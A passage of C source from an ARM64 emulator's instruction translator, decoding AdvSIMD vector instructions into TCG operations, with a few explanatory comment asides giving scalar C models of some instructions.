gen_helper_advsimd_mulh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x14: /* FCMGE */ gen_helper_advsimd_cge_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x15: /* FACGE */ gen_helper_advsimd_acge_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x17: /* FDIV */ gen_helper_advsimd_divh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1a: /* FABD */ gen_helper_advsimd_subh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); tcg_gen_andi_i32(tcg_ctx, tcg_res, tcg_res, 0x7fff); break; case 0x1c: /* FCMGT */ gen_helper_advsimd_cgt_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1d: /* FACGT */ gen_helper_advsimd_acgt_f16(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; default: fprintf(stderr, "%s: insn %#04x, fpop %#2x @ %#" PRIx64 "\n", __func__, 
insn, fpopcode, s->pc_curr); g_assert_not_reached(); } write_vec_element_i32(s, tcg_res, rd, pass, MO_16); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); } } tcg_temp_free_ptr(tcg_ctx, fpst); clear_vec_high(s, is_q, rd); } /* AdvSIMD three same extra * 31 30 29 28 24 23 22 21 20 16 15 14 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+---+--------+---+----+----+ * | 0 | Q | U | 0 1 1 1 0 | size | 0 | Rm | 1 | opcode | 1 | Rn | Rd | * +---+---+---+-----------+------+---+------+---+--------+---+----+----+ */ static void disas_simd_three_reg_same_extra(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int opcode = extract32(insn, 11, 4); int rm = extract32(insn, 16, 5); int size = extract32(insn, 22, 2); bool u = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); bool feature; int rot; switch (u * 16 + opcode) { case 0x10: /* SQRDMLAH (vector) */ case 0x11: /* SQRDMLSH (vector) */ if (size != 1 && size != 2) { unallocated_encoding(s); return; } feature = dc_isar_feature(aa64_rdm, s); break; case 0x02: /* SDOT (vector) */ case 0x12: /* UDOT (vector) */ if (size != MO_32) { unallocated_encoding(s); return; } feature = dc_isar_feature(aa64_dp, s); break; case 0x18: /* FCMLA, #0 */ case 0x19: /* FCMLA, #90 */ case 0x1a: /* FCMLA, #180 */ case 0x1b: /* FCMLA, #270 */ case 0x1c: /* FCADD, #90 */ case 0x1e: /* FCADD, #270 */ if (size == 0 || (size == 1 && !dc_isar_feature(aa64_fp16, s)) || (size == 3 && !is_q)) { unallocated_encoding(s); return; } feature = dc_isar_feature(aa64_fcma, s); break; default: unallocated_encoding(s); return; } if (!feature) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } switch (opcode) { case 0x0: /* SQRDMLAH (vector) */ switch (size) { case 1: gen_gvec_op3_env(s, is_q, rd, rn, rm, gen_helper_gvec_qrdmlah_s16); break; case 2: gen_gvec_op3_env(s, is_q, rd, rn, rm, gen_helper_gvec_qrdmlah_s32); break; default: g_assert_not_reached(); } return; case 0x1: /* SQRDMLSH (vector) */ switch (size) { case 1: gen_gvec_op3_env(s, is_q, rd, rn, rm, gen_helper_gvec_qrdmlsh_s16); break; case 2: gen_gvec_op3_env(s, is_q, rd, rn, rm, gen_helper_gvec_qrdmlsh_s32); break; default: g_assert_not_reached(); } return; case 0x2: /* SDOT / UDOT */ gen_gvec_op3_ool(s, is_q, rd, rn, rm, 0, u ? 
gen_helper_gvec_udot_b : gen_helper_gvec_sdot_b); return; case 0x8: /* FCMLA, #0 */ case 0x9: /* FCMLA, #90 */ case 0xa: /* FCMLA, #180 */ case 0xb: /* FCMLA, #270 */ rot = extract32(opcode, 0, 2); switch (size) { case 1: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, true, rot, gen_helper_gvec_fcmlah); break; case 2: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, false, rot, gen_helper_gvec_fcmlas); break; case 3: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, false, rot, gen_helper_gvec_fcmlad); break; default: g_assert_not_reached(); } return; case 0xc: /* FCADD, #90 */ case 0xe: /* FCADD, #270 */ rot = extract32(opcode, 1, 1); switch (size) { case 1: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, size == 1, rot, gen_helper_gvec_fcaddh); break; case 2: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, size == 1, rot, gen_helper_gvec_fcadds); break; case 3: gen_gvec_op3_fpst(s, is_q, rd, rn, rm, size == 1, rot, gen_helper_gvec_fcaddd); break; default: g_assert_not_reached(); } return; default: g_assert_not_reached(); } } static void handle_2misc_widening(DisasContext *s, int opcode, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Handle 2-reg-misc ops which are widening (so each size element * in the source becomes a 2*size element in the destination. * The only instruction like this is FCVTL. */ int pass; if (size == 3) { /* 32 -> 64 bit fp conversion */ TCGv_i64 tcg_res[2]; int srcelt = is_q ? 2 : 0; for (pass = 0; pass < 2; pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, srcelt + pass, MO_32); gen_helper_vfp_fcvtds(tcg_ctx, tcg_res[pass], tcg_op, tcg_ctx->cpu_env); tcg_temp_free_i32(tcg_ctx, tcg_op); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } else { /* 16 -> 32 bit fp conversion */ int srcelt = is_q ? 4 : 0; TCGv_i32 tcg_res[4]; TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); TCGv_i32 ahp = get_ahp_flag(tcg_ctx); for (pass = 0; pass < 4; pass++) { tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_res[pass], rn, srcelt + pass, MO_16); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_res[pass], tcg_res[pass], fpst, ahp); } for (pass = 0; pass < 4; pass++) { write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); } tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, ahp); } } static void handle_rev(DisasContext *s, int opcode, bool u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int op = (opcode << 1) | u; int opsz = op + size; int grp_size = 3 - opsz; int dsize = is_q ? 
128 : 64; int i; if (opsz >= 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (size == 0) { /* Special case bytes, use bswap op on each group of elements */ int groups = dsize / (8 << grp_size); for (i = 0; i < groups; i++) { TCGv_i64 tcg_tmp = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_tmp, rn, i, grp_size); switch (grp_size) { case MO_16: tcg_gen_bswap16_i64(tcg_ctx, tcg_tmp, tcg_tmp); break; case MO_32: tcg_gen_bswap32_i64(tcg_ctx, tcg_tmp, tcg_tmp); break; case MO_64: tcg_gen_bswap64_i64(tcg_ctx, tcg_tmp, tcg_tmp); break; default: g_assert_not_reached(); } write_vec_element(s, tcg_tmp, rd, i, grp_size); tcg_temp_free_i64(tcg_ctx, tcg_tmp); } clear_vec_high(s, is_q, rd); } else { int revmask = (1 << grp_size) - 1; int esize = 8 << size; int elements = dsize / esize; TCGv_i64 tcg_rn = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_rd = tcg_const_i64(tcg_ctx, 0); TCGv_i64 tcg_rd_hi = tcg_const_i64(tcg_ctx, 0); for (i = 0; i < elements; i++) { int e_rev = (i & 0xf) ^ revmask; int off = e_rev * esize; read_vec_element(s, tcg_rn, rn, i, size); if (off >= 64) { tcg_gen_deposit_i64(tcg_ctx, tcg_rd_hi, tcg_rd_hi, tcg_rn, off - 64, esize); } else { tcg_gen_deposit_i64(tcg_ctx, tcg_rd, tcg_rd, tcg_rn, off, esize); } } write_vec_element(s, tcg_rd, rd, 0, MO_64); write_vec_element(s, tcg_rd_hi, rd, 1, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_rd_hi); tcg_temp_free_i64(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); } } static void handle_2misc_pairwise(DisasContext *s, int opcode, bool u, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Implement the pairwise operations from 2-misc: * SADDLP, UADDLP, SADALP, UADALP. * These all add pairs of elements in the input to produce a * double-width result element in the output (possibly accumulating). */ bool accum = (opcode == 0x6); int maxpass = is_q ? 2 : 1; int pass; TCGv_i64 tcg_res[2]; if (size == 2) { /* 32 + 32 -> 64 op */ MemOp memop = size + (u ? 
0 : MO_SIGN); for (pass = 0; pass < maxpass; pass++) { TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op1, rn, pass * 2, memop); read_vec_element(s, tcg_op2, rn, pass * 2 + 1, memop); tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); if (accum) { read_vec_element(s, tcg_op1, rd, pass, MO_64); tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); } tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); } } else { for (pass = 0; pass < maxpass; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); NeonGenOneOpFn *genfn; static NeonGenOneOpFn * const fns[2][2] = { { gen_helper_neon_addlp_s8, gen_helper_neon_addlp_u8 }, { gen_helper_neon_addlp_s16, gen_helper_neon_addlp_u16 }, }; genfn = fns[size][u]; tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); genfn(tcg_ctx, tcg_res[pass], tcg_op); if (accum) { read_vec_element(s, tcg_op, rd, pass, MO_64); if (size == 0) { gen_helper_neon_addl_u16(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op); } else { gen_helper_neon_addl_u32(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op); } } tcg_temp_free_i64(tcg_ctx, tcg_op); } } if (!is_q) { tcg_res[1] = tcg_const_i64(tcg_ctx, 0); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } static void handle_shll(DisasContext *s, bool is_q, int size, int rn, int rd) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Implement SHLL and SHLL2 */ int pass; int part = is_q ? 2 : 0; TCGv_i64 tcg_res[2]; for (pass = 0; pass < 2; pass++) { static NeonGenWidenFn * const widenfns[3] = { gen_helper_neon_widen_u8, gen_helper_neon_widen_u16, tcg_gen_extu_i32_i64, }; NeonGenWidenFn *widenfn = widenfns[size]; TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); read_vec_element_i32(s, tcg_op, rn, part + pass, MO_32); tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); widenfn(tcg_ctx, tcg_res[pass], tcg_op); tcg_gen_shli_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], 8 << size); tcg_temp_free_i32(tcg_ctx, tcg_op); } for (pass = 0; pass < 2; pass++) { write_vec_element(s, tcg_res[pass], rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); } } /* AdvSIMD two reg misc * 31 30 29 28 24 23 22 21 17 16 12 11 10 9 5 4 0 * +---+---+---+-----------+------+-----------+--------+-----+------+------+ * | 0 | Q | U | 0 1 1 1 0 | size | 1 0 0 0 0 | opcode | 1 0 | Rn | Rd | * +---+---+---+-----------+------+-----------+--------+-----+------+------+ */ static void disas_simd_two_reg_misc(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int size = extract32(insn, 22, 2); int opcode = extract32(insn, 12, 5); bool u = extract32(insn, 29, 1); bool is_q = extract32(insn, 30, 1); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); bool need_fpstatus = false; bool need_rmode = false; int rmode = -1; TCGv_i32 tcg_rmode; TCGv_ptr tcg_fpstatus; switch (opcode) { case 0x0: /* REV64, REV32 */ case 0x1: /* REV16 */ handle_rev(s, opcode, u, is_q, size, rn, rd); return; case 0x5: /* CNT, NOT, RBIT */ if (u && size == 0) { /* NOT */ break; } else if (u && size == 1) { /* RBIT */ break; } else if (!u && size == 0) { /* CNT */ break; } unallocated_encoding(s); return; case 0x12: /* XTN, XTN2, SQXTUN, SQXTUN2 */ case 0x14: /* SQXTN, SQXTN2, UQXTN, UQXTN2 */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_narrow(s, false, opcode, u, 
is_q, size, rn, rd); return; case 0x4: /* CLS, CLZ */ if (size == 3) { unallocated_encoding(s); return; } break; case 0x2: /* SADDLP, UADDLP */ case 0x6: /* SADALP, UADALP */ if (size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_pairwise(s, opcode, u, is_q, size, rn, rd); return; case 0x13: /* SHLL, SHLL2 */ if (u == 0 || size == 3) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_shll(s, is_q, size, rn, rd); return; case 0xa: /* CMLT */ if (u == 1) { unallocated_encoding(s); return; } /* fall through */ case 0x8: /* CMGT, CMGE */ case 0x9: /* CMEQ, CMLE */ case 0xb: /* ABS, NEG */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x3: /* SUQADD, USQADD */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_satacc(s, false, u, is_q, size, rn, rd); return; case 0x7: /* SQABS, SQNEG */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0xc: case 0xd: case 0xe: case 0xf: case 0x16: case 0x17: case 0x18: case 0x19: case 0x1a: case 0x1b: case 0x1c: case 0x1d: case 0x1e: case 0x1f: { /* Floating point: U, size[1] and opcode indicate operation; * size[0] indicates single or double precision. */ int is_double = extract32(size, 0, 1); opcode |= (extract32(size, 1, 1) << 5) | (u << 6); size = is_double ? 3 : 2; switch (opcode) { case 0x2f: /* FABS */ case 0x6f: /* FNEG */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x1d: /* SCVTF */ case 0x5d: /* UCVTF */ { bool is_signed = (opcode == 0x1d) ? true : false; int elements = is_double ? 2 : is_q ? 4 : 2; if (is_double && !is_q) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_simd_intfp_conv(s, rd, rn, elements, is_signed, 0, size); return; } case 0x2c: /* FCMGT (zero) */ case 0x2d: /* FCMEQ (zero) */ case 0x2e: /* FCMLT (zero) */ case 0x6c: /* FCMGE (zero) */ case 0x6d: /* FCMLE (zero) */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } handle_2misc_fcmp_zero(s, opcode, false, u, is_q, size, rn, rd); return; case 0x7f: /* FSQRT */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ need_fpstatus = true; need_rmode = true; rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x5c: /* FCVTAU */ case 0x1c: /* FCVTAS */ need_fpstatus = true; need_rmode = true; rmode = FPROUNDING_TIEAWAY; if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x3c: /* URECPE */ if (size == 3) { unallocated_encoding(s); return; } /* fall through */ case 0x3d: /* FRECPE */ case 0x7d: /* FRSQRTE */ if (size == 3 && !is_q) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_2misc_reciprocal(s, opcode, false, u, is_q, size, rn, rd); return; case 0x56: /* FCVTXN, FCVTXN2 */ if (size == 2) { unallocated_encoding(s); return; } /* fall through */ case 0x16: /* FCVTN, FCVTN2 */ /* handle_2misc_narrow does a 2*size -> size operation, but these * instructions encode the source size rather than dest size. 
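 * That is why size - 1 is passed below. Illustrative aside (not part of
 * the decoder): a scalar model of FCVTN/FCVTN2 for the 64-to-32-bit
 * case, assuming IEEE-754 float/double and leaving rounding-mode
 * detail aside:
 *
 *     // part = 0 for FCVTN (writes the low half, zeroes the high half);
 *     // part = 1 for FCVTN2 (writes the high half, keeps the low half)
 *     static void fcvtn_model(float dst[4], const double src[2], int part)
 *     {
 *         for (int i = 0; i < 2; i++) {
 *             dst[part * 2 + i] = (float)src[i];
 *         }
 *         if (part == 0) {
 *             dst[2] = dst[3] = 0.0f;   // upper half of Vd is cleared
 *         }
 *     }
 *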
*/ if (!fp_access_check(s)) { return; } handle_2misc_narrow(s, false, opcode, 0, is_q, size - 1, rn, rd); return; case 0x17: /* FCVTL, FCVTL2 */ if (!fp_access_check(s)) { return; } handle_2misc_widening(s, opcode, is_q, size, rn, rd); return; case 0x18: /* FRINTN */ case 0x19: /* FRINTM */ case 0x38: /* FRINTP */ case 0x39: /* FRINTZ */ need_rmode = true; rmode = extract32(opcode, 5, 1) | (extract32(opcode, 0, 1) << 1); /* fall through */ case 0x59: /* FRINTX */ case 0x79: /* FRINTI */ need_fpstatus = true; if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x58: /* FRINTA */ need_rmode = true; rmode = FPROUNDING_TIEAWAY; need_fpstatus = true; if (size == 3 && !is_q) { unallocated_encoding(s); return; } break; case 0x7c: /* URSQRTE */ if (size == 3) { unallocated_encoding(s); return; } need_fpstatus = true; break; case 0x1e: /* FRINT32Z */ case 0x1f: /* FRINT64Z */ need_rmode = true; rmode = FPROUNDING_ZERO; /* fall through */ case 0x5e: /* FRINT32X */ case 0x5f: /* FRINT64X */ need_fpstatus = true; if ((size == 3 && !is_q) || !dc_isar_feature(aa64_frint, s)) { unallocated_encoding(s); return; } break; default: unallocated_encoding(s); return; } break; } default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } if (need_fpstatus || need_rmode) { tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, false); } else { tcg_fpstatus = NULL; } if (need_rmode) { tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); } else { tcg_rmode = NULL; } switch (opcode) { case 0x5: if (u && size == 0) { /* NOT */ gen_gvec_fn2(s, is_q, rd, rn, tcg_gen_gvec_not, 0); return; } break; case 0xb: if (u) { /* ABS, NEG */ gen_gvec_fn2(s, is_q, rd, rn, tcg_gen_gvec_neg, size); } else { gen_gvec_fn2(s, is_q, rd, rn, tcg_gen_gvec_abs, size); } return; } if (size == 3) { /* All 64-bit element operations can be shared with scalar 2misc */ int pass; /* Coverity claims (size == 3 && !is_q) has been eliminated * from all paths leading to here. */ tcg_debug_assert(is_q); for (pass = 0; pass < 2; pass++) { TCGv_i64 tcg_op = tcg_temp_new_i64(tcg_ctx); TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); read_vec_element(s, tcg_op, rn, pass, MO_64); handle_2misc_64(s, opcode, u, tcg_res, tcg_op, tcg_rmode, tcg_fpstatus); write_vec_element(s, tcg_res, rd, pass, MO_64); tcg_temp_free_i64(tcg_ctx, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op); } } else { int pass; for (pass = 0; pass < (is_q ? 4 : 2); pass++) { TCGv_i32 tcg_op = tcg_temp_new_i32(tcg_ctx); TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); TCGCond cond; read_vec_element_i32(s, tcg_op, rn, pass, MO_32); if (size == 2) { /* Special cases for 32 bit elements */ switch (opcode) { case 0xa: /* CMLT */ /* 32 bit integer comparison against zero, result is * test ? (2^32 - 1) : 0. We implement via setcond(test) * and inverting. */ cond = TCG_COND_LT; do_cmop: tcg_gen_setcondi_i32(tcg_ctx, cond, tcg_res, tcg_op, 0); tcg_gen_neg_i32(tcg_ctx, tcg_res, tcg_res); break; case 0x8: /* CMGT, CMGE */ cond = u ? TCG_COND_GE : TCG_COND_GT; goto do_cmop; case 0x9: /* CMEQ, CMLE */ cond = u ? 
TCG_COND_LE : TCG_COND_EQ; goto do_cmop; case 0x4: /* CLS */ if (u) { tcg_gen_clzi_i32(tcg_ctx, tcg_res, tcg_op, 32); } else { tcg_gen_clrsb_i32(tcg_ctx, tcg_res, tcg_op); } break; case 0x7: /* SQABS, SQNEG */ if (u) { gen_helper_neon_qneg_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); } else { gen_helper_neon_qabs_s32(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); } break; case 0x2f: /* FABS */ gen_helper_vfp_abss(tcg_ctx, tcg_res, tcg_op); break; case 0x6f: /* FNEG */ gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_op); break; case 0x7f: /* FSQRT */ gen_helper_vfp_sqrts(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); break; case 0x1a: /* FCVTNS */ case 0x1b: /* FCVTMS */ case 0x1c: /* FCVTAS */ case 0x3a: /* FCVTPS */ case 0x3b: /* FCVTZS */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_tosls(tcg_ctx, tcg_res, tcg_op, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x5a: /* FCVTNU */ case 0x5b: /* FCVTMU */ case 0x5c: /* FCVTAU */ case 0x7a: /* FCVTPU */ case 0x7b: /* FCVTZU */ { TCGv_i32 tcg_shift = tcg_const_i32(tcg_ctx, 0); gen_helper_vfp_touls(tcg_ctx, tcg_res, tcg_op, tcg_shift, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); break; } case 0x18: /* FRINTN */ case 0x19: /* FRINTM */ case 0x38: /* FRINTP */ case 0x39: /* FRINTZ */ case 0x58: /* FRINTA */ case 0x79: /* FRINTI */ gen_helper_rints(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x59: /* FRINTX */ gen_helper_rints_exact(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x7c: /* URSQRTE */ gen_helper_rsqrte_u32(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x1e: /* FRINT32Z */ case 0x5e: /* FRINT32X */ gen_helper_frint32_s(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; case 0x1f: /* FRINT64Z */ case 0x5f: /* FRINT64X */ gen_helper_frint64_s(tcg_ctx, tcg_res, tcg_op, tcg_fpstatus); break; default: g_assert_not_reached(); } } else { /* Use helpers for 8 and 16 bit elements */ switch (opcode) { case 0x5: /* CNT, RBIT */ /* For these two insns size is part of the opcode specifier * (handled earlier); they always operate on byte elements. 
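 *
 * Illustrative aside (not part of the decoder): minimal scalar models
 * of the two per-byte helpers, assuming only C99 integer types:
 *
 *     #include <stdint.h>
 *
 *     static uint8_t cnt_byte(uint8_t x)   // CNT: population count
 *     {
 *         uint8_t n = 0;
 *         while (x) {
 *             x &= (uint8_t)(x - 1);       // clears the lowest set bit
 *             n++;
 *         }
 *         return n;
 *     }
 *
 *     static uint8_t rbit_byte(uint8_t x)  // RBIT: reverse bit order
 *     {
 *         uint8_t r = 0;
 *         for (int i = 0; i < 8; i++) {
 *             r = (uint8_t)((r << 1) | (x & 1));
 *             x >>= 1;
 *         }
 *         return r;
 *     }
 *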
*/ if (u) { gen_helper_neon_rbit_u8(tcg_ctx, tcg_res, tcg_op); } else { gen_helper_neon_cnt_u8(tcg_ctx, tcg_res, tcg_op); } break; case 0x7: /* SQABS, SQNEG */ { NeonGenOneOpEnvFn *genfn; static NeonGenOneOpEnvFn * const fns[2][2] = { { gen_helper_neon_qabs_s8, gen_helper_neon_qneg_s8 }, { gen_helper_neon_qabs_s16, gen_helper_neon_qneg_s16 }, }; genfn = fns[size][u]; genfn(tcg_ctx, tcg_res, tcg_ctx->cpu_env, tcg_op); break; } case 0x8: /* CMGT, CMGE */ case 0x9: /* CMEQ, CMLE */ case 0xa: /* CMLT */ { static NeonGenTwoOpFn * const fns[3][2] = { { gen_helper_neon_cgt_s8, gen_helper_neon_cgt_s16 }, { gen_helper_neon_cge_s8, gen_helper_neon_cge_s16 }, { gen_helper_neon_ceq_u8, gen_helper_neon_ceq_u16 }, }; NeonGenTwoOpFn *genfn; int comp; bool reverse; TCGv_i32 tcg_zero = tcg_const_i32(tcg_ctx, 0); /* comp = index into [CMGT, CMGE, CMEQ, CMLE, CMLT] */ comp = (opcode - 0x8) * 2 + u; /* ...but LE, LT are implemented as reverse GE, GT */ reverse = (comp > 2); if (reverse) { comp = 4 - comp; } genfn = fns[comp][size]; if (reverse) { genfn(tcg_ctx, tcg_res, tcg_zero, tcg_op); } else { genfn(tcg_ctx, tcg_res, tcg_op, tcg_zero); } tcg_temp_free_i32(tcg_ctx, tcg_zero); break; } case 0x4: /* CLS, CLZ */ if (u) { if (size == 0) { gen_helper_neon_clz_u8(tcg_ctx, tcg_res, tcg_op); } else { gen_helper_neon_clz_u16(tcg_ctx, tcg_res, tcg_op); } } else { if (size == 0) { gen_helper_neon_cls_s8(tcg_ctx, tcg_res, tcg_op); } else { gen_helper_neon_cls_s16(tcg_ctx, tcg_res, tcg_op); } } break; default: g_assert_not_reached(); } } write_vec_element_i32(s, tcg_res, rd, pass, MO_32); tcg_temp_free_i32(tcg_ctx, tcg_res); tcg_temp_free_i32(tcg_ctx, tcg_op); } } clear_vec_high(s, is_q, rd); if (need_rmode) { gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } if (need_fpstatus) { tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); } } /* AdvSIMD [scalar] two register miscellaneous (FP16) * * 31 30 29 28 27 24 23 22 21 17 16 12 11 10 9 5 4 0 * +---+---+---+---+---------+---+-------------+--------+-----+------+------+ * | 0 | Q | U | S | 1 1 1 0 | a | 1 1 1 1 0 0 | opcode | 1 0 | Rn | Rd | * +---+---+---+---+---------+---+-------------+--------+-----+------+------+ * mask: 1000 1111 0111 1110 0000 1100 0000 0000 0x8f7e 0c00 * val: 0000 1110 0111 1000 0000 1000 0000 0000 0x0e78 0800 * * This actually covers two groups where scalar access is governed by * bit 28. A bunch of the instructions (float to integral) only exist * in the vector form and are un-allocated for the scalar decode. Also * in the scalar decode Q is always 1. */ static void disas_simd_two_reg_misc_fp16(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int fpop, opcode, a, u; int rn, rd; bool is_q; bool is_scalar; bool only_in_vector = false; int pass; TCGv_i32 tcg_rmode = NULL; TCGv_ptr tcg_fpstatus = NULL; bool need_rmode = false; bool need_fpst = true; int rmode; if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } rd = extract32(insn, 0, 5); rn = extract32(insn, 5, 5); a = extract32(insn, 23, 1); u = extract32(insn, 29, 1); is_scalar = extract32(insn, 28, 1); is_q = extract32(insn, 30, 1); opcode = extract32(insn, 12, 5); fpop = deposit32(opcode, 5, 1, a); fpop = deposit32(fpop, 6, 1, u); rd = extract32(insn, 0, 5); rn = extract32(insn, 5, 5); switch (fpop) { case 0x1d: /* SCVTF */ case 0x5d: /* UCVTF */ { int elements; if (is_scalar) { elements = 1; } else { elements = (is_q ? 
8 : 4); } if (!fp_access_check(s)) { return; } handle_simd_intfp_conv(s, rd, rn, elements, !u, 0, MO_16); return; } break; case 0x2c: /* FCMGT (zero) */ case 0x2d: /* FCMEQ (zero) */ case 0x2e: /* FCMLT (zero) */ case 0x6c: /* FCMGE (zero) */ case 0x6d: /* FCMLE (zero) */ handle_2misc_fcmp_zero(s, fpop, is_scalar, 0, is_q, MO_16, rn, rd); return; case 0x3d: /* FRECPE */ case 0x3f: /* FRECPX */ break; case 0x18: /* FRINTN */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_TIEEVEN; break; case 0x19: /* FRINTM */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_NEGINF; break; case 0x38: /* FRINTP */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_POSINF; break; case 0x39: /* FRINTZ */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_ZERO; break; case 0x58: /* FRINTA */ need_rmode = true; only_in_vector = true; rmode = FPROUNDING_TIEAWAY; break; case 0x59: /* FRINTX */ case 0x79: /* FRINTI */ only_in_vector = true; /* current rounding mode */ break; case 0x1a: /* FCVTNS */ need_rmode = true; rmode = FPROUNDING_TIEEVEN; break; case 0x1b: /* FCVTMS */ need_rmode = true; rmode = FPROUNDING_NEGINF; break; case 0x1c: /* FCVTAS */ need_rmode = true; rmode = FPROUNDING_TIEAWAY; break; case 0x3a: /* FCVTPS */ need_rmode = true; rmode = FPROUNDING_POSINF; break; case 0x3b: /* FCVTZS */ need_rmode = true; rmode = FPROUNDING_ZERO; break; 